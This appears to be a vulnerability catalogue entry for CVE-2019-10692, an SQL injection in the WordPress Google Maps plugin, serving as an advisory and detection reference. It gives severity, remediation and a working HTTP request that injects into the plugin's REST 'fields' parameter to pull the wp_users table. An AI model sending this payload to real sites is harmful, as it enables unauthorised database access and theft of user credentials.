| Title | WordPress Google Maps <7.11.18 - SQL Injection |
|---|---|
| Author | pussycat0x |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. |
| Remediation | Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). |
| CVSS Score | 9.8 |
| EPSS Score | 0.89356 |
| CVE ID | CVE-2019-10692 |
| CWE ID | CWE-89 |
| Tags | cve2019 cve wp wp-plugin unauth sqli wordpress googlemaps wpscan codecabin vuln |
WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-10692.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-10692.pcap
N/AN/A